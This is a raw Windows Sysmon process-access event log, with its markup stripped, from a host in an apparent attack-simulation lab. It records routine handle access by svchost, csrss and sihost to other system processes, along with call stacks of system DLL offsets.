12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.894{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.879{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.770{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.536{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.536{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.521{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.521{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.334{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.334{266CAFBE-64C4-6064-9C00-00000000AE01}46202908C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:27.318{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000006230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 